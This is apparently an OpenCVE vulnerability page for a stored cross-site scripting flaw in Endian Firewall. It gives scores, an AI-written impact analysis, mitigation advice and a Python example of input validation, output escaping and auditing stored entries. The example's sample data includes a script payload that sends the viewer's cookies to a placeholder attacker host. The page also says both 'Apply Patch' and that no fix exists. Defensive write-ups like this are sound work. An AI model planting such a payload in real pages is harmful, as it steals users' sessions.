Description
Endian Firewall version 3.3.25 and prior allow stored cross-site scripting (XSS) via the domain parameter to /manage/smtpscan/domainrouting/. An authenticated attacker can inject arbitrary JavaScript that is stored and executed when other users view the affected page.
Published: 2026-04-02
Score: 5.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting
Action: Apply Patch
AI Analysis

Impact

This vulnerability permits a stored cross‑site scripting attack through the domain parameter of the /manage/smtpscan/domainrouting/ endpoint. An attacker who can authenticate to the web interface can submit a domain value containing arbitrary JavaScript; the value is saved with the domain-routing configuration and rendered back without escaping, so the script executes each time another user views the affected page. Because it runs with the viewing user's authenticated session, the payload can steal session cookies, deface the interface, exfiltrate data, or issue requests to the management interface on that user's behalf.

Affected Systems

The flaw affects Endian Firewall version 3.3.25 and prior. The CPE records attached to the CVE name versions 2.1.2, 2.4 and 3.3.25 of Endian Firewall and, separately, Endian Firewall Community (all versions). Deployments on these versions remain vulnerable until patched.

Risk and Exploitability

The CVSS v4.0 base score is 5.1 (Medium); the v3.1 vector scores 6.4. The EPSS score below 1% indicates a low estimated probability of exploitation in the wild, the issue is not listed in CISA’s KEV catalog, and the SSVC assessment records no known exploitation and rates it not automatable. The attacker needs an authenticated account on the firewall’s web interface (PR:L); the stored payload then fires when another user, typically an administrator, opens the domain-routing page (UI:P). Because the script executes in that victim’s browser under the victim’s session, the impact falls on the subsequent system rather than the firewall itself (SC:L/SI:L), and the attacker needs no network access to the victim beyond the shared management interface.

Generated by OpenCVE AI on April 6, 2026 at 19:44 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the Endian Firewall release that addresses the stored XSS issue as soon as the vendor publishes one; at the time of this page no vendor fix or workaround was listed.
  • Until then, restrict access to the management interface, and the /manage/smtpscan/domainrouting/ endpoint in particular, to trusted administrator accounts and networks, and review the existing domain-routing entries for values that are not plain hostnames: a payload stored before the fix stays in the configuration and continues to fire on every page view until it is removed.
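The two halves of the fix for a CWE-79 issue of this shape, shown as an added example rather than Endian Firewall code: reject anything that is not a syntactically valid hostname before it is stored, and HTML-escape every stored value at render time so that entries stored before the fix cannot execute. The function names, the in-memory domain_routing_store, and the sample entries (including the injected one) are constructed for the illustration and are assumptions, not the product's real schema or API. The audit helper at the end is the check suggested above for finding already-stored payloads.

```python
"""Stored XSS via a 'domain' parameter: input validation, output encoding and an
audit of existing entries. Constructed example; names and the store layout are
assumptions, not Endian Firewall code."""
import html
import re

# RFC 1123 style hostname label: letters, digits and hyphens, no leading or
# trailing hyphen, at most 63 characters. A full name is dot-joined labels.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")


def is_valid_domain(value: str) -> bool:
    """Allow-list check for the 'domain' parameter: anything that is not a
    syntactically valid hostname (so anything containing '<', quotes, spaces,
    etc.) is refused before it reaches storage."""
    if not value or len(value) > 253:
        return False
    return _HOSTNAME_RE.fullmatch(value) is not None


# Constructed stand-in for the persisted domain-routing table as a list of
# (domain, target) pairs. The second entry is a stored payload that an
# attacker managed to save before validation was in place.
domain_routing_store = [
    ("example.com", "mail.example.com"),
    ("<script>document.location='http://attacker.invalid/?c='+document.cookie</script>", "10.0.0.5"),
    ("mail.example.net", "smtp.example.net"),
]


def add_domain_route(store, domain: str, target: str) -> bool:
    """Hardened write path: refuse the entry instead of storing markup."""
    if not is_valid_domain(domain) or not is_valid_domain(target):
        return False
    store.append((domain, target))
    return True


def render_domain_table_vulnerable(store) -> str:
    """The unsafe pattern: stored values are concatenated straight into the
    page, so a stored payload runs in every viewer's browser."""
    rows = "".join(f"<tr><td>{d}</td><td>{t}</td></tr>" for d, t in store)
    return f"<table>{rows}</table>"


def render_domain_table(store) -> str:
    """Hardened read path: HTML-escape each stored value at output time. This
    also neutralises entries that were stored before validation existed."""
    rows = "".join(
        f"<tr><td>{html.escape(d)}</td><td>{html.escape(t)}</td></tr>"
        for d, t in store
    )
    return f"<table>{rows}</table>"


_MARKUP_RE = re.compile(r"[<>\"'&]")


def find_suspicious_entries(store):
    """Audit check for an existing configuration: return entries whose domain
    or target is not a valid hostname or carries HTML-significant characters."""
    flagged = []
    for d, t in store:
        if (not is_valid_domain(d) or not is_valid_domain(t)
                or _MARKUP_RE.search(d + t)):
            flagged.append((d, t))
    return flagged


if __name__ == "__main__":
    print("vulnerable render:", render_domain_table_vulnerable(domain_routing_store))
    print("hardened render:  ", render_domain_table(domain_routing_store))
    print("flagged entries:  ", find_suspicious_entries(domain_routing_store))
```

Validation alone is not enough, because it does nothing for values that are already stored; escaping alone is not enough either, because the same value may be reused in contexts other than HTML (log lines, mail headers, the SMTP proxy configuration). Doing both, and running the audit once over the current configuration, covers the stored payload case the advisory describes.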

Generated by OpenCVE AI on April 6, 2026 at 19:44 UTC.

Advisories

No advisories yet.

History

Mon, 06 Apr 2026 16:45:00 +0000

Type                | Values Removed | Values Added
First Time appeared |                | Endian firewall Community
CPEs                |                | cpe:2.3:a:endian:firewall_community:*:*:*:*:*:*:*:*
Vendors & Products  |                | Endian firewall Community

Thu, 02 Apr 2026 20:30:00 +0000

Type    | Values Removed | Values Added
Metrics |                | ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 02 Apr 2026 15:15:00 +0000

Type                | Values Removed | Values Added
Description         |                | Endian Firewall version 3.3.25 and prior allow stored cross-site scripting (XSS) via the domain parameter to /manage/smtpscan/domainrouting/. An authenticated attacker can inject arbitrary JavaScript that is stored and executed when other users view the affected page.
Title               |                | Endian Firewall /manage/smtpscan/domainrouting/ domain Stored Cross-Site Scripting
First Time appeared |                | Endian; Endian firewall
Weaknesses          |                | CWE-79
CPEs                |                | cpe:2.3:a:endian:firewall:2.1.2:*:*:*:*:*:*:*; cpe:2.3:a:endian:firewall:2.4:*:*:*:*:*:*:*; cpe:2.3:a:endian:firewall:3.3.25:*:*:*:*:*:*:*
Vendors & Products  |                | Endian; Endian firewall
References          |                |
Metrics             |                | cvssV3_1: {'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}; cvssV4_0: {'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N'}


MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-04-02T15:37:51.767Z

Reserved: 2026-03-30T20:26:18.726Z

Link: CVE-2026-34816

Vulnrichment

Updated: 2026-04-02T15:37:41.562Z

NVD

Status : Analyzed

Published: 2026-04-02T15:16:50.073

Modified: 2026-04-06T16:13:01.423

Link: CVE-2026-34816

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-07T07:56:12Z

Weaknesses